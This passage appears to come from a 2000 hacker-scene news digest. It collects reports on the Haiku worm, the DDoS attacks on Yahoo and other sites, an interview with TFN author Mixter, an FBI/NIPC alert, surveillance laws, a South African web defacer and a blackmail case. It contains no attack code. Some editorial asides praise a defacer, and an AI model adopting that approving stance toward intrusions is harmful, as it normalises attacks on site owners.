WIN.INI file, so the Worm will be loaded when Windows is restarted. The Worm then displays a poem that is generated from an internal list of words. The program exits when the 'OK' button is selected. The next time a computer is restarted, the Worm will be loaded automatically. At that point, it will not display any messages and is registered as a service, so that it doesn't appear in the tasklist. The Worm stays resident, checking for an active dial-up Internet connection. When it finds one, it will search through files with the extension .doc, .eml, .htm, .html, .rtf and .txt looking for email addresses. The Haiku Worm then attempts to send a copy of itself to all of the email addresses that it has found. ``CA aims to provide the most current and accurate information regarding the latest Worm threats for our clients,'' said Simon Perry, CA's security business manager. ``This worm is dangerous for eBusinesses because it disguises itself cleverly and obtains email addresses from documents rather address books. CA is urging all of our clients to download the latest signature files that will provide protection from this latest threat.'' For the latest information about computer viruses and worms, visit http://www.ca.com/virusinfo. CA is offering free downloads of antivirus software for personal use at http://antivirus.cai.com and encourages computer users to take advantage of this offering. Computer Associates International, Inc. (NYSE: CA - news), the world's leading business software company, delivers the end-to-end infrastructure to enable eBusiness through innovative technology, services and education. CA has 18,000 employees worldwide and had revenue of $6.3 billion for the year ended December 31, 1999. For more information, visit http://www.ca.com. All trademarks, tradenames, service marks and logos referenced herein belong to their respective companies. SOURCE: Computer Associates International, Inc. @HWA 128.0 HNN: Feb 11th;Investigations Continue, Reports of more Possible Attacks Surface ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid Early reports indicate that Excite may have been hit with a denial of service attack early this morning. Some evidence seems to suggest that AOL has also been hit however neither has yet been confirmed. More information on the attacks is now becoming available as sites recover from the attacks. After further investigation Yahoo has said that they have been able to determine that they actually suffered four separate attacks prior to the one that took them offline. All the attacks had a large distributed smurf component to them. Other sites have reported single sourced syn-attacks which may indicate copy cat activity. Of the several attacks against Yahoo only the one beginning at 10:30am PST on Monday had any noticeable effect. The massive amount of traffic generated, in excess of 1G bits/sec, took down one router and when it recovered Yahoo lost all routing to their upstream ISP. Due to earlier network hardware problems investigators believed this to be the reason for the outage at first. After completely pulling the plug from their upstream ISP, Yahoo was able to stitch things back together and finally realized that they had been under a widely distributed DoS attack. The attacker(s) seemed to know about the network topology and planned this large scale attack in advance. Global Center, the Yahoo ISP, is now throttling all forms of ICMP until they can determine the best configuration to prevent future attacks. @HWA 129.0 HNN: Feb 11th;Author of Tool Used in Attacks Speaks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Frank Mixter, based in Germany and the author of Tribal Flood Network, has granted several interviews. He has said that using his tools to create such attacks "is quite easy". Heise - German http://www.heise.de/newsticker/data/nl-10.02.00-000/ ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2436358,00.html Web-Sabotage: Eine harte Nuss für das FBI US-Justizministerin Janet Reno hat gestern abend auf einer Pressekonferenz eine umfassende Untersuchung der aktuellen Sabotageakte im Internet angekündigt. Die amerikanische Kriminalpolizei FBI hat die Fahndung nach Hackern aufgenommen, die den dritten Tag in Folge populäre Internetfirmen attackiert haben. Reno versicherte, die Washingtoner Regierung werde alles tun, um die Sicherheit des elektronischen Handels im Internet zu garantieren. Nach wie vor sind keine "Bekennerschreiben" aufgetaucht, auch über die Motive der Hacker herrscht Reno zufolge bisher Unklarheit. Der FBI-Experte für Computersicherheit, Ron Dick, erklärte, das Spektrum der möglichen Täter sei groß. Derartige Attacken könnten auf das Konto eines Teenagers gehen, aber auch auf das einer ausländischen Regierung. Den oder die Täter zu ermitteln dürfte sehr schwierig sein, da hierzu große Mengen von Protokolldateien auf einer Reihe von Rechnersystemen ausgewertet werden müssen. Bei Distributed Denial-of-Service (DDoS) Attacks, wie sie in den letzten Tagen auftraten, arbeiten die Hacker über ein mehrstufiges System infiltrierter Computer. Das Hacker-News-Network (HNN) sprach von einem Kontrollknoten, auf dem eine Liste von bis zu zehntausend geknackten Rechnern gefunden wurde, die für Angriffe zur Verfügung standen. HNN meldet zudem, dass einige der Datenbomben Inhalt trugen, der die Kommerzialisierung des Internet verwünscht habe. Auch Grüße an Hackerzirkel und den deutschen Hacker Mixter, dem Programmierer eines DDoS-Tools, seien beobachtet worden. Mixter zeigte sich c't gegenüber schockiert und distanzierte sich von den Attacken: "Es scheint, als wären die Angreifer ziemlich ahnungslose Leute, die machtvolle Ressourcen und Programme für sinnlose Aktivitäten missbrauchen, einfach nur weil sie es können. Das hat nichts mit Hacken oder 'Hacktivismus' zu tun." Nicht zuletzt zeigen die Vorfälle Risiken einer digitalisierten Gesellschaft, die sich immer mehr auf die Verfügbarkeit der elektronischen Infrastruktur verlässt: Bisher waren nur E-Commerce-Sites und Dienstleister betroffen -- die Hauptfolgen sind Wartezeiten und Unbequemlichkeiten für die Kunden, der finanzielle Schaden dürfte vergleichsweise gering ausfallen. Gleichartige Angriffe könnten aber im Prinzip jeden Dienst lahm legen, der über ein öffentlich zugängliches Netz läuft. Damit könnten beispielsweise Wirtschaftsunternehmen bei zeitkritischen Verhandlungen Konkurrenten ausschalten, Störer die Koordination von Rettungsmaßnahmen im Katastrophenfall behindern oder Regierungen unliebsame Bürgerrechtsbewegungen zum Schweigen bringen. (nl/c't) -=- Author of Web attack tool speaks 'The Net is as susceptible to hack attacks as its weakest parts.' So says 'Mixter,' the hacker who created the tool possibly used in this week's spate of Web attacks. By Robert Lemos, ZDNet News UPDATED February 10, 2000 5:04 PM PT The Internet has its own sense of irony. While chatting online with ZDNet about this week's spate of Web attacks, "Mixter" -- a self-proclaimed "white-hat hacker" who created the Tribal Flood Network denial-of-service tool some believe is responsible for several of those attacks -- was knocked offline by a flood of data similar to those very same attacks. "It's quite easy," Mixter said of the data-flood technique used against Yahoo!, eBay, Buy.com, Amazon.com, CNN, E*Trade, MSN.com and ZDNet. And the tool allegedly created by the 20-year-old German-based hacker makes it even easier. The Tribal Flood Network and its newest version, TFN2K, can implement a denial of service by flooding servers and routers with a bewildering variety of different data types. In an exclusive chat interview with ZDNet, Mixter called Tribal Flood Network a teaching tool that points out the holes in the Web. Others consider it a danger. ZDNet: How did you get into security? Mixter: Well, I worked with computers for a long time. I started with my first computer when I was 6 years old, and I've been interested in the technical details of operating systems and networks since I was about 14 when I got my first PC with an Internet connection. ZDNet: What computer did you start with? Mixter: Commodore 64. ZDNet: Do you consider what you do to be "hacking"? Mixter: I think what I do is hacking in the "traditional" sense, but I'm afraid to use the term, since the meaning of "hacker" is changing to something negative. I had some conflicts with the law in the past, but I'm a white-hat now. ZDNet: What sort of things happened in the past? Mixter: Well, I started with it like many people on Efnet (a major IRC chat network) do, by learning how to take over and how to secure chat channels. Then I went over to programming and writing IRC robots. Unfortunately, I have also "actively" taught myself how to get into systems. I used some compromised systems for running and testing IRC bots, for which I've been raided and persecuted, but gladly I didn't commit real major damage with anything I did. I consider it as a mistake in my past, from which I've learned. ZDNet: Why did you want to make a tool like TFN and make it public for all the script kiddies to use and abuse? Mixter: I rewrote TFN after what I thought Trinoo (a tool that makes another DoS attack known as SMURFing easy) worked like because Trinoo was kept private. First, I called it the "teletubby flood network," but I thought the name was just too silly. The problem (with today's infrastructure) is that a lot of weaknesses exist. For example, you can employ spoofing and distributed concepts, and it is hard to do something against it due to Internet protocol weaknesses. I decided to write TFN and post the source code publicly to security sites, so people could scrutinize the code, and possible upcoming attack methods, and come up with a patch. This is the security concept known as "full disclosure." The main idea is that security people find and post any weaknesses, including really dangerous ones, as soon as possible, so everyone has a chance of analyzing them and thinking about countermeasures. ZDNet: Yet, there seems to be no comprehensive solution to the problem. That is, if you want to let people access your site, you must to some degree be susceptible to a DDoS (distributed denial-of-service) attack. Mixter: That's true, but the real problem is the lack of authentification in current protocols. Besides, you actually have to compromise a real lot of other hosts to be able to penetrate fast sites. ... That is the concept of DDoS. There are methods (to stop more advanced DoS attacks) including SYN interception and proxying at the routers. However, all these short time measures can only minimize the impact of the floods; they cannot fully prevent it. When a site is attacked really badly, they're probably still going to notice it somehow. ZDNet: So, in your mind, what is the solution to this problem? Mixter: Well, you can basically spoof the origin of any packet arbitrarily. And that has to be prevented in the long term by migrating to IPv6 (the next-generation Internet protocol), which provides necessary authentication facilities and a bunch of other security extensions. ZDNet: What is the short-term solution? Mixter: The solution for the hosts that are being compromised is simply to care about their security, by updating their software and configurations. It's that easy. The attacker *HAS* to gain access to his "slave" servers by exploiting existent security vulnerabilities. The Net is as susceptible to hack attacks as its weakest parts. Also, limit the amount of bandwidth that is being let through at the backbone provider. This is a concept that many people are implementing. ZDNet: And when do you think IPv6 will actually make it into most of the infrastructure? Mixter: IPv6 should get implemented as soon as possible, not only because of security aspects, but because the growth of the Internet will make it inevitably necessary by 2004, or sooner. The old IP protocol is a relic, comparable to the Y2K bug. It is soon going to cause problems if people don't care about it. ZDNet: Do you think that the people who make these tools available (i.e., put power in the hands of people who don't use it responsibly) are responsible for the use of them? Yourself, for instance? Mixter: No, that's generally not the case, and it is, in my opinion, irrational to say so. I also know the author of Trinoo, who hasn't directly been launching the attacks, but I think he is afraid and wants to stay anonymous. ZDNet: Are you planning to make any other such tools? Mixter: Currently not. I've released TFN2K, after the CERT advisory. The purpose of releasing another DDoS tool was to include all possible attacking, stealthing, etc., features in that tool that could be developed in the future I could think of. We are currently seeing new derivatives of tools with small variations, but nothing that is really worse or more "powerful" in any way. ... My purpose of releasing TFN2K was showing all these risks in one rush, and as early as possible. ZDNet: So, anything you want to say about the attacks that are currently occurring? Mixter: Well, there has been rumor that they included in the packets some protest against e-commerce. I think they are mostly social motivated, and I don't condone any of such activity. Most of all because it doesn't require really great technical skill to install these tools and launch attacks, and it serves absolutely no constructive purpose. @HWA 130.0 HNN: Feb 11th;NIPC Reissues Alert on DDoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by suthercj The National Infrastructure Protection Center has reissued its advisory concerning Distributed Denial of Service attacks. The advisory was originally issued in December of 1999. FBI.gov http://www.fbi.gov/nipc/ddos.htm (Dig, my ALL-CAPS AUTHORITAY! yesh you can find them on IRC and on AOL as well - Ed) SUBJECT: NATIONAL INFRASTRUCTURE PROTECTION CENTER INFORMATION SYSTEM ALERT (NIPC ALERT 00-034): RE-ISSUE OF NATIONAL INFRASTRUCTURE PROTECTION CENTER INFORMATION SYSTEM ALERT (NIPC ALERT 99-029) ORIGINALLY ISSUED 12/6/99; 1. BEGINNING ON 7 FEBRUARY 2000, A NUMBER OF HIGH-PROFILE DENIAL OF SERVICE (DOS) ATTACKS TEMPORARILY DISABLED SIGNIFICANT ELECTRONIC COMMERCE INTERNET WEB SITES. THESE CYBER ATTACKS TARGETED COMPANIES SITES LIKE YAHOO.COM, AMAZON.COM, CNN.COM, BUY.COM, EBAY.COM, STAMPS.COM, EXODUS.COM, ETRADE.COM, AND ZDNET.COM; REPORTED VICTIMS HAVE APPARENTLY RECOVERED FROM THE ATTACKS WITHIN A FEW HOURS. PUBLIC REPORTING CITES COORDINATED, DISTRIBUTED DENIAL OF SERVICE (DDOS) ATTACKS ORIGINATING FROM MULTIPLE POINTS ON THE INTERNET. THE FBI IS NOW INVESTIGATING A NUMBER OF THESE ATTACKS; IN VIEW OF THESE EVENTS THE NIPC IS RE-ISSUING ITS ORIGINAL ALERT DESCRIBING THE DDOS EXPLOIT. ADDITIONAL INFORMATION CAN ALSO BE FOUND ON THE NIPC WEB PAGE AT WWW.NIPC.GOV AND AT THE CARNEGIE MELLON COMPUTER EMERGENCY RESPONSE TEAM COORDINATION CENTER (CERT/CC) WEB PAGE AT WWW.CERT.ORG. 2. BEGINNING IN THE FALL OF 1999, THE FBI/NIPC BECAME AWARE OF SEVERAL INSTANCES WHERE INTRUDERS INSTALLED DISTRIBUTED DENIAL OF SERVICE TOOLS ON VARIOUS COMPUTER SYSTEMS TO CREATE LARGE HOST NETWORKS CAPABLE OF LAUNCHING SIGNIFICANT COORDINATED PACKET FLOODING DENIAL OF SERVICE ATTACKS. INSTALLATION WAS ACCOMPLISHED PRIMARILY THROUGH COMPROMISES EXPLOITING KNOWN SUN RPC VULNERABILITIES. THESE MULTIPLE DENIAL OF SERVICE TOOLS INCLUDE TRIN00, TRIBE FLOOD NETWORK (OR TFN), TFN2K, AND STACHELDRAHT, AND WERE REPORTED ON DIFFERENT CIVILIAN, UNIVERSITY AND U.S. GOVERNMENT SYSTEMS. THE FBI CONTINUES INVESTIGATION OF MANY OF THESE INCIDENTS, AND WAS AND IS HIGHLY CONCERNED ABOUT THE SCALE AND SIGNIFICANCE OF THESE INCIDENTS, FOR THE FOLLOWING REASONS: A) MANY OF THE TARGETS ARE UNIVERSITIES OR OTHER SITES WITH HIGH BANDWIDTH INTERNET CONNECTIONS, REPRESENTING A POSSIBLY SIGNIFICANT THREAT TO INTERNET TRAFFIC. B) THE KNOWN CASES INVOLVE REAL AND SUBSTANTIAL FINANCIAL LOSS. C) THE ACTIVITY TIES BACK TO SIGNIFICANT NUMBERS AND LOCATIONS OF DOMESTIC AND OVERSEAS IP ADDRESSES. D) THE TECHNICAL VULNERABILITIES USED TO INSTALL THESE DENIAL OF SERVICE TOOLS ARE WIDESPREAD, WELL-KNOWN AND READILY ACCESSIBLE ON MOST NETWORKED SYSTEMS THROUGHOUT THE INTERNET. E) THE TOOLS APPEAR TO BE UNDERGOING ACTIVE DEVELOPMENT, TESTING AND DEPLOYMENT ON THE INTERNET. F) THE ACTIVITY OFTEN STOPS ONCE SYSTEM OWNERS START FILTERING FOR TRINOO/TFN AND RELATED ACTIVITY. POSSIBLE MOTIVES FOR THIS MALICIOUS ACTIVITY RANGE FROM EXPLOIT DEMONSTRATION, TO EXPLORATION OR RECONNAISSANCE, TO PREPARATION FOR WIDESPREAD DENIAL OF SERVICE ATTACKS. NIPC WAS CONCERNED THAT THESE TOOLS COULD HAVE BEEN PREPARED FOR EMPLOYMENT DURING THE Y2K PERIOD, AND REMAINS CONCERNED THIS ACTIVITY COULD CONTINUE TARGETING OTHER SIGNIFICANT COMMERCIAL, GOVERNMENT OR NATIONAL SITES 3. NIPC REQUESTS THAT ALL COMPUTER NETWORK OWNERS AND ORGANIZATIONS RAPIDLY EXAMINE THEIR SYSTEMS FOR EVIDENCE OF THESE DISTRIBUTED DENIAL OF SERVICE TOOLS, IN ORDER TO BE ABLE TO QUICKLY IMPLEMENT CORRECTIVE MEASURES (SPECIFIC TECHNICAL INSTRUCTIONS ARE AVAILABLE FROM CERT-CC, SANS, NIPC, OR OTHER SOURCES). THESE CHECKS SHOULD BE DONE TO BOTH CHECK AND CLEAR SYSTEMS OF TRINOO/TFN AND RELATED THREATS, AND TO SUPPORT LAW ENFORCEMENT EFFORTS INVESTIGATING THESE EXPLOITS. RECIPIENTS ARE ASKED TO REPORT SIGNIFICANT OR SUSPECTED CRIMINAL ACTIVITY TO THEIR LOCAL FBI OFFICE, NIPC WATCH/WARNING UNIT, COMPUTER EMERGENCY RESPONSE SUPPORT AND OTHER LAW ENFORCEMENT AGENCIES, AS APPROPRIATE. THE NIPC WATCH AND WARNING UNIT CAN BE REACHED AT (202) 323-3204/3205/3206, OR NIPC.WATCH@FBI.GOV. @HWA 131.0 HNN: Feb 11th; Lawmakers Succumb to Kneejerk Reaction ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench "We might have to pass some legislation to get even tougher" on computer crime, Senate Judiciary Committee Chairman Orin Hatch, R-Utah, said Wednesday. Hatch intends to hold a hearing sometime in March to determine whether current laws give law enforcers the "tools that they need" to prosecute computer crime offenses. News Bytes http://www.newsbytes.com/pubNews/00/143704.html Senators Mobilize Against Website Attacks (I love Feds! - Ed) By David McGuire, Newsbytes WASHINGTON, DC, U.S.A., 10 Feb 2000, 5:02 PM CST Responding to the spate of recent attacks against commercial Websites, a number of legislators are calling for a crackdown on computer crime. "We might have to pass some legislation to get even tougher" on computer crime, Senate Judiciary Committee Chairman Orin Hatch, R-Utah, said Wednesday. Hatch intends to hold a hearing sometime in March to determine whether current laws give law enforcers the "tools that they need" to prosecute computer crime offenses, Judiciary Committee spokesperson Jeanne Lopatto said today. Senate Majority Leader Trent Lott has also raised concerns about the recent attacks and is "monitoring the situation," according to the majority leader's office. Hatch, Lott and others on the hill are reacting to the recent glut of "denial of service" attacks against large e-commerce providers such as Amazon.com, CNN.com, and E-Trade. The most recent confirmed attack struck Excite and there are unconfirmed reports that America Online has fallen victim to a denial of service attack. Reported by Newsbytes.com, http://www.newsbytes.com . @HWA dum de dum, de dum dum dum... dum de doo do you trinoo? 132.0 HNN: Feb 11th; Humor in the Face of Chaos ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by n A rather funny political cartoon that pretty much sums up many peoples feeling on this matter has been posted. Cartoon http://syndicam.com/cartoons/2000gifs/cam021000_hackers.gif @HWA 133.0 HNN: Feb 11th; Britain Passes Despotic Laws ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Lady Sharrow The UK Government came under fire on Thursday from the internet community after it published a Bill to regulate covert surveillance. The critics say the legislation, if passed, could lead to innocent people being sent to jail simply because they have lost their data encryption codes. The Regulation of Investigatory Powers Bill covers the monitoring and the interception of communications by law enforcement and security agencies. It will, for example, lay down the legal rules that must be followed by the police and security services when they tap someone's phone. BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_638000/638041.stm Surveillance bill under fire At issue is the burden of proof The UK Government came under fire on Thursday from the internet community after it published a Bill to regulate covert surveillance. The critics say the legislation, if passed, could lead to innocent people being sent to jail simply because they have lost their data encryption codes. The Regulation of Investigatory Powers Bill covers the monitoring and the interception of communications by law enforcement and security agencies. It will, for example, lay down the legal rules that must be followed by the police and security services when they tap someone's phone. It also regulates the authorities' access to the codes that encrypt data sent over the net. Such encryption will increasingly become a routine tool of e-commerce, built into ordinary e-mail and browser software. But the Home Office is deeply concerned that criminals, such as paedophiles, will use encryption to hide their activities. And, as a result, the Bill proposes that the police or the security services should have the power to force someone to hand over decryption keys or the plain text of specified materials, such as e-mails, and jail those who refuse. The government believes it has built sufficient safeguards into the legislation. But Caspar Bowden, from the Foundation for Information Policy Research, said the law as drafted was "impossible" and accused the government of ignoring all the advice and lobbying it had received from the net community over the past year. Net privacy At issue is the burden of proof. Critics of the legislation say someone might go to jail unless they could prove they did not have a requested key - an impossible defence for someone who has lost the software code. "This law could make a criminal out of anyone who uses encryption to protect their privacy on the internet," Mr Bowden said. "The Department of Trade and Industry jettisoned decryption powers from its e-Communications Bill last year because it did not believe that a law which presumes someone guilty unless they can prove themselves innocent was compatible with the Human Rights Act. "But the corpse of a law laid to rest by Trade Secretary Stephen Byers has been stitched up and jolted back into life by Home Secretary Jack Straw." Under the new legislation, the police would have to have "reasonable grounds to believe" someone suspected illegal activity had a key. Previous attempts to draft the legislation had only used the word "appear". Human rights Caspar Bowden acknowledged that the change replaced a subjective test with one requiring some objective evidence. The prosecution would have to show that someone receiving encrypted e-mail has or had a key. However, he said the presumption of guilt remained for those who had genuinely lost or forgotten their keys. "It's clear we are heading for the courts with a human rights test case," Mr Bowden told BBC News Online. "The legislation could be amended, but it's obvious the government is not going to take that course." However, the Home Secretary, Jack Straw, is clearly confident about the legal advice he has received. "The Human Rights Act and rapid change in technology are the twin drivers of the new Bill," he said. "None of the law enforcement activities specified in the Bill is new. Covert surveillance by police and other law enforcement officers is as old as policing itself; so too is the use of informants, agents, and undercover officers. "What is new is that for the first time the use of these techniques will be properly regulated by law, and externally supervised, not least to ensure that law enforcement operations are consistent with the duties imposed on public authorities by the European Convention on Human Rights and the Human Rights Act." @HWA 134.0 HHN: Feb 11th; France Sues US and UK over Echelon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by n The British and US Governments are to be sued in France after claims that the countries have spied on French companies, diplomats and political officials. Lawyers are planning a class action suit after confirmation last week that a global eavesdropping spy network exists. The Times UK http://www.the-times.co.uk/news/pages/tim/2000/02/10/timfgneur01007.html?999 February 10 2000 EUROPE French to sue US and Britain over network of spies FROM ADAM SAGE IN PARIS THE British and US Governments are to be sued in France after claims that they have spied on French companies, diplomats and Cabinet ministers. Lawyers are planning a class action after confirmation last week that a global anglophone spy network exists. Codenamed P-415 Echelon, the world's most powerful electronic spy system was revealed in declassified US National Security Agency documents published on the Internet, and is capable of intercepting telephone conversations, faxes and e-mails. The system was established in the 1980s by the UKUSA alliance, which unites the British, American, Australian, New Zealand and Canadian secret services. In Europe, its listening devices are at Menwith Hill defence base in Yorkshire. French MPs claim to have evidence that the European Airbus consortium lost a Fr35 billion (£3.5 billion) contract in 1995 after its offer was overheard and passed to Boeing. Georges Sarre, a left-wing MP, said: "The participation of the United Kingdom in spying on its European partners for and with the US raises serious and legitimate concerns in that it creates a particularly acute conflict of interest within the European Union." The European Parliament's Civil Liberties Committee will study a report on the Echelon network on February 23. The debate is certain to fuel criticism of Britain's role. Until this month, the network was an official secret recognised by none of the members of the UKUSA alliance. But the documents published by the George Washington University prove its existence and its capacity to intercept civilian satellite communications. Jean-Pierre Millet, a Parisian lawyer, said that Echelon tracked every mobile and satellite call, but only decoded those involving a key figure. "You can bet that every time a French government minister makes a mobile phone call, it is recorded," he said. M Millet said that Echelon's system leaves it open to legal challenge under French privacy laws. "The simple fact that an attempt has been made to intercept a communication is against the law in France, however the information is exploited." Yesterday he said that he would bring an action on behalf of French civil liberty groups. @HWA 135.0 HNN; Feb 11th; Mellissa Virus Comes Back ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Not that she ever really went away but the Melissa virus reappeared Thursday afternoon clogging the email systems of Washington's Snohomish County government's e-mail system. Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500166597-500212095-500988439-0,00.html Melissa virus resurfaces, shuts down Washington county e-mail system Copyright © 2000 Nando Media Copyright © 2000 Associated Press EVERETT, Wash. (February 11, 2000 8:35 a.m. EST http://www.nandotimes.com) - A computer virus blamed for more than $80 million in damage last year has resurfaced, this time in the Snohomish County government's e-mail system. The virus known as Melissa eluded virus defenses and infested county computers about noon Thursday, resulting in shutdown of the e-mail system, said Colin Bottem, director of information services. The rest of the county's computer services were not affected, Bottem said. E-mail servers were "being cleaned up" and the system should be operating normally again Friday afternoon, Bottem said. Melissa struck thousands of e-mail systems last March, disguised as an "important message" from a friend, and spread around the world like an electronic chain letter. In December, David L. Smith, a computer programmer, pleaded guilty in Newark, N.J., to creating the virus and using a sex Web site to spread it through cyberspace. When the message is opened, the virus goes to the recipient's computer address book and sends the same message to the first 50 e-mail addresses. "It replicates itself," Bottem said. @HWA 136.0 aKt0r's story by Wyzewun ~~~~~~~~~~~~~~~~~~~~~~~~ aKt0r's Story Contributed by Wyzewun The following is an article out of January 16th's edition of "The Star", South Africa's most popular Sunday newspaper... [Comments by me are enclosed in square brackets] --- Begin Article --- Computer Boffs Hunt Teen Hacker 'Akt0r' claims his intentions are good By Andre Jurgens A Computer Whiz Kid has become South Africa's most wanted "cyber-villian" after breaking into nearly a dozen "safe" Internet web sites. The 19-year-old, who calls himself Akt0r, has so far evaded capture but computer security experts from the Johannesburg Stock Exchange are on his trail after an embarassing attack on their web site last weekend. Akt0r claims in just four months to have "cracked" sites owned by Eskom, The Police, Rand Afrikaans University, Southern Life, Stormers Rugby Club, Incredible Connection, Computicket, Durban Metropolitan Council and the government's Stats SA page. Each time he replaced their official webpages with his own messages, criticising their "clueless" security and hinting that he was willing to accept a job in the computer industry. The companies were not eager to discuss the attacks in detail this week but all said no confidential information had been compromised. [Wyzewun: This is true for the South African Police Service, because their page is hosted at a seperate ISP and have their private network accessible only over dialup. However, I seriously doubt this is true for the likes of Incredible Connection and Southern Life.] Akt0r told the Sunday Times he broke into the web sites "for a good cause, to prove a point actually - Security measures in South Africa are quite lame", he said, "Privacy is not well guarded. How safe do you think your personal details are?" "I'm not malicious. I have not destroyed or stolen information." His goals are to land a job in the information technology industry. "I've had enough of hacking. I want to get a job and make a positive contribution to the industry." [Wyzewun: More about this after the article :P] Last year he telephonically warned companies about computer security. "They weren't interested, especially Eskom, so I defaced their sites to teach them a few tricks." Also known as "Zilly Zaber" and "Purple Chaos", he is a member of an international hacking gang called the Binary Outlaws. [Wyzewun: More commonly known as the b1nary 0utlawz or b10z] "We're against the way governments and big businesses manipulate people. They control information and information shapes people's lives around the world. We've cracked big websites around the world to get this message out." The 15-member gang, all male, are scattered through Bosnia, New Zealand, The US, Cyprus, Sweden, Ireland and South Africa. Akt0r taught himself the tricks of the trade working in a computer shop, and started hacking at the age of 16 with an Internet group called the North American Intelligence Liberation. [Wyzewun: They never did a great deal, but cracked an insecure NASA box (Vulnerable to PHF in 1997). They were disbanded when one of the NAiL members mysteriously disappeared after hitting some or other gov thingymabob :( One neat thing they did was...] "We defaced the Ku Klux Klan web site and replaced it with a picture of Martin Luther King and a message about free speech. They went ballistic." He is not worried about being caught. "I didn't cover my tracks well. It's quite simple to find me but most companies don't have the knowledge." He said there was virtually no law in South Africa against "cracking" - what hackers define as breaking into web sites with good and non-destructive intentions. [Wyzewun: HUH? Who's definition of cracking is THAT?] "My mom and dad will probably freak. I'm thinking about telling them what I've done," he said. South African computer security expert Ian Melamed said Akt0r should put his energy into stopping hackers. "We are desperately short of good technical experts in the industry. No right minded person can support the introduction of techno thuggery," he said. Earlier this week, Richard Miller, general manager of information technology at the Johannesburg Stock Exchange, said investigations were closing in on Akt0r. [Wyzewun: Yeh right, if they haven't got him by now, they won't have him ever, aKt0r knows an infinite amount more than all the JSE "experts"] He denied that any confidential information had been lost. --- End Article --- Well, aKt0r is a good friend - and I respect him, but a lot of his friends don't approve of this new "hacking for a job" mission he's going on. Certainly this can be achieved, but by defacing a site you blow away all your chances of succeeding. He should rather persist at bugging the company day after day, and try and get some form of reaction that way. I originally became aware that aKt0r was doing this when Moe1, part of the Forbidden Knowledge e-zine staff [packetstorm.securify.com/mag/fk] and another member of b10z who helps aKt0r with many of his defacements msg'd me... <Moe1> Oh, btw, I have Nothing to do with aKt0r's latest <Moe1> Some-one needs to talk some sense to that kid Yeah, aKt0r is a pimp and I love him, but this new shit he's up to is just a bit too suicidal. He also told me he intended to stop cracking after the new computer crime laws came in, which it appears he hasn't. He is pushing harder and harder, and attracting too much media attention, and somewhere along the line, something is going to give. We don't need or want a South African Mitnick, and it looks like that could be his eventual path. :/ He is set to do an interview with Carte Blanche in the near future, along with the most prominent members of the South African Hacking scene (Vortexia, Pneuma, Myself and some others). I will have the show put into MPG and will publish a URL for it in HWA.hax0r.news as soon as it is available. Later... @HWA 137.0 ISN: Jan 16:Hacker gang blackmails firms with stolen files ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN mailing list. (Subscription list) http://www.the-times.co.uk/news/pages/sti/2000/01/16/stinwenws01028.html?3259223 Hacker gang blackmails firms with stolen files Jon Ungoed-Thomas and Stan Arnaud [The Sunday Times] (12.16.2000) A BRITISH group of hackers has broken into the computer systems of at least 12 multinational companies and stolen confidential files. It has issued ransom demands of up to 10m and is also suspected of hiring out its services. Scotland Yard is now investigating the attacks, which computer experts have described as the most serious systematic breach ever of companies' security in Britain. "The group is using very sophisticated techniques and has been exchanging information via e-mail and internet chat," said an investigator. Visa confirmed last week that it had received a ransom demand last month, believed to have been for 10m. "We were hacked into in mid-July last year," said Russ Yarrow, a company spokesman. "They gained access to some corporate material and we informed both Scotland Yard and the FBI." It is understood the hackers stole computer "source codes" that are critical to programming, and threatened to crash the entire system. If Visa's system crashed for just one day, the company - which handles nearly 1 trillion business a year from customers holding 800m Visa cards - could lose tens of millions of pounds. "We received a phone call and an e-mail to an office in England demanding money," Yarrow said. The company contacted police after the ransom demand. "We hardened the system, we sealed it and they did not return. We have firewalls upon firewalls, but are concerned that anyone got in." Scotland Yard's computer crime unit is now scrutinising e-mail traffic between several known hackers in England and Scotland. Last month officers from the unit flew to Hopeman, a Scottish fishing village, and seized equipment from the home of James Grant, who works for a local computer company. He has been interviewed by detectives and Visa security experts. It is understood that he has given a legal undertaking to Visa not to discuss the matter. "He is saying nothing at all," said his mother, Rhona. "That is a situation that will not change in the future." Grant, 20, studied computing in nearby Elgin, and now works for Data Converters, based in Elgin. His father is a member of the civilian security staff at RAF Lossiemouth air base and his mother a care worker. Detectives are studying attacks on at least 12 companies that they believe have been penetrated by the group and others that may be connected, including one within the Virgin group, in which a hacker tried to break into the UK mailing system. They believe the group may also be acting as paid specialists for information brokers who trade corporate secrets. "These are professionals and there is some evidence that suggests some of the activity was contracted and paid for," said a computer expert involved in the investigation. The group's success has exposed flaws in security. The internet company CD Universe last week confirmed it had called in the FBI after being blackmailed by a hacker who had copied more than 300,000 of its customer credit card files. Scotland Yard said: "There is an ongoing investigation into the incident involving Visa, but it is too early to speculate about the involvement of a group." ISN is sponsored by Security-Focus.COM @HWA 138.0 How to steal 2,500 credit cards ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Dragos Ruiu http://www.zdnet.co.uk/news/2000/2/ns-12672.html How to steal 2,500 credit cards Mon, 17 Jan 2000 10:19:05 GMT Bob Sullivan, MSNBC Remarkable discovery by MSNBC investigation, uncovers e-commerce sites' shoddy security. Just how easy is it to steal credit card numbers on the Internet? Last week, MSNBC was able to view nearly 2,500 credit card numbers stored by seven small e-commerce Web sites within a few minutes, using elementary instructions provided by a source. In all cases, a list of customers and all their personal information was connected to 